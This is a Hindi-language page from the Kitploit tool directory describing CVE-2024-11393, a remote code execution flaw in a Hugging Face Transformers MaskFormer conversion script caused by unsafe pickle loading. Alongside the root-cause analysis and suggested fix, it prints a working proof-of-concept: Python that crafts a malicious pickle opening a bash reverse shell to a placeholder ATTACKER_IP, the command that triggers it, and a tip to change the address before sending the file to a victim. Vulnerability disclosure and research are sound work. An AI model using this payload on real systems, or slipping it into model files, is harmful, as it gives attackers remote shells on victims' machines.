Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-11393 — CVE-2024-11393 के लिए तकनीकी विवरण और शोषण | Kitploit
उपकरण/GitHubGitHub/piyush-bhor/cve-2024-11393
भेद्यता विश्लेषणकोड विश्लेषणशोषणलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubpiyush-bhor/cve-2024-11393

CVE-2024-11393

CVE-2024-11393 के लिए तकनीकी विवरण और शोषण

रिपॉजिटरी देखें
4131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-11393

Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability - असुरक्षित डेटा के डिसीरियलाइज़ेशन से दूरस्थ कोड निष्पादन भेद्यता

भेद्यता का उच्च-स्तरीय अवलोकन और प्रभाव:
यह भेद्यता हमलावर को होस्ट मशीन पर मनमाना कोड निष्पादित करने की अनुमति देती है, जब वह Hugging Face Transformers रिपॉजिटरी में convert_maskformer_swin_to_pytorch.py स्क्रिप्ट को एक दुर्भावनापूर्ण maskformer resnet चेकपॉइंट फ़ाइल प्रदान करता है।
यदि कोई अनजान उपयोगकर्ता किसी तृतीय-पक्ष maskformer resnet चेकपॉइंट फ़ाइल का उपयोग करता है, तो convert_maskformer_swin_to_pytorch.py स्क्रिप्ट को निष्पादित करने पर पीड़ित के सिस्टम पर दूरस्थ कोड निष्पादन (RCE) हो जाएगा।

भेद्य उत्पाद

  • उत्पाद: Hugging Face Transformers
  • मॉड्यूल: Maskformer
  • फ़ाइल: transformers/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py
  • संस्करण: नवीनतम
  • GitHub Permalink: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py#L240
  • मूल कारण विश्लेषण

    • भेद्यता का विस्तृत विवरण: यह भेद्यता अविश्वसनीय डेटा के असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न होती है। स्क्रिप्ट चेकपॉइंट फ़ाइल को लोड करने के लिए pickle.load का उपयोग करती है और कोड निष्पादन के प्रति संवेदनशील है।

    • इनपुट से भेद्य स्थिति तक कोड प्रवाह:

    1. उपयोगकर्ता एक तृतीय-पक्ष maskformer मॉडल डाउनलोड करता है।
    2. उपयोगकर्ता convert_maskformer_swin_to_pytorch.py स्क्रिप्ट चलाता है और उसे चेकपॉइंट फ़ाइल प्रदान करता है।
    3. convert_maskformer_swin_to_pytorch.py स्क्रिप्ट चेकपॉइंट फ़ाइल को डिसीरियलाइज़ करती है और दुर्भावनापूर्ण कोड निष्पादित करती है।
    • इंजेक्शन बिंदु: भेद्यता उस स्थान पर होती है जहाँ pickle.load को कॉल किया जाता है।
      GitHub Permalink: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py#L240

    • सुझाए गए सुधार: मनमाना कोड निष्पादन को रोकने के लिए pickle.load को yaml.safe_load(yaml_file) या json.load से बदलें।

    • प्रूफ-ऑफ-कॉन्सेप्ट निष्पादित करने के निर्देश:

    1. एक दुर्भावनापूर्ण पिकल फ़ाइल malicious.pkl बनाएँ जो पीड़ित के सिस्टम पर एक रिवर्स शेल बनाएगी:
    root@kitploit:~
    # exploit.py
    
    import pickle  
    import os   
      
    class Exploit:  
        def __reduce__(self):  
            return (os.system, ('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1',))  
      
    malicious_data = pickle.dumps(Exploit())  
    with open('malicious.pkl', 'wb') as f:  
        f.write(malicious_data)  
      
    print("Malicious pickle file created successfully.")
    

    नोट: फ़ाइल पीड़ित को भेजने से पहले ATTACKER_IP और ATTACKER_PORT बदलें।

    1. convert_maskformer_swin_to_pytorch.py स्क्रिप्ट चलाएँ और malicious.pkl फ़ाइल को --checkpoint_path में पास करें:
    root@kitploit:~
    > python convert_maskformer_swin_to_pytorch.py --checkpoint_path malicious.pkl --model_name maskformer-swin-tiny-ade --pytorch_dump_folder_path . --push_to_hub 
    

    नोट: pytorch_dump_folder_path को किसी भी निर्देशिका पर सेट किया जा सकता है, और model_name कोई भी मॉडल हो सकता है।

    सॉफ़्टवेयर डाउनलोड लिंक:
    https://github.com/huggingface/transformers/tree/main

    टूल डाउनलोड करें